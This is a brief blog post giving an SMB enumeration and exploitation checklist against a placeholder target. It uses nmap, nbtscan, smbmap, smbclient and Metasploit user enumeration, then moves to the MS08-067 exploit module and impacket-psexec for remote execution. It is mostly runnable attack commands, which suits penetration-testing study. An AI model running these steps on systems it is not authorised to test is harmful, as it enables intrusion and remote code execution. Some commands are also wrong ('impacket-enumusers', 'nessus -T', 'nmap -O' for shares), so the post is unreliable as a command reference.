SMB Enumeration

04 November 2023 - Posted in Uncategorized by The XSS Rat

Identify the target IP address or hostname. This can be done using tools such as Nmap or Netcat.

nmap -sT -p 139,445 <target IP address>

nc -v <target IP address> 139

Enumerate NetBIOS information. This can be done using tools such as Nmblookup, Nbtscan, or Nmap.

nmblookup -A <target IP address>

nbtscan <target IP address>

nmap -sT -p 139,445 -A <target IP address>

Enumerate SMB shares. This can be done using tools such as Smbmap, Smbclient, or Nmap.

smbmap -H <target IP address>

smbclient -L <target IP address>

nmap -sT -p 139,445 -O <target IP address>

Enumerate SMB users. This can be done using tools such as Metasploit or Impacket.

msfconsole
use auxiliary/scanner/smb/smb_enumusers
set rhosts <target IP address>
run

impacket-enumusers <target IP address>

Enumerate SMB vulnerabilities. This can be done using tools such as Nmap or Nessus.

nmap -sT -p 139,445 -A -v <target IP address>

nessus -T <target IP address>

Perform SMB exploitation. This can be done using tools such as Metasploit or Impacket.

msfconsole
use exploit/windows/smb/ms08_067_netapi
set rhosts <target IP address>
run

impacket-psexec <target IP address>

recon

Next Post Previous Post

Related Posts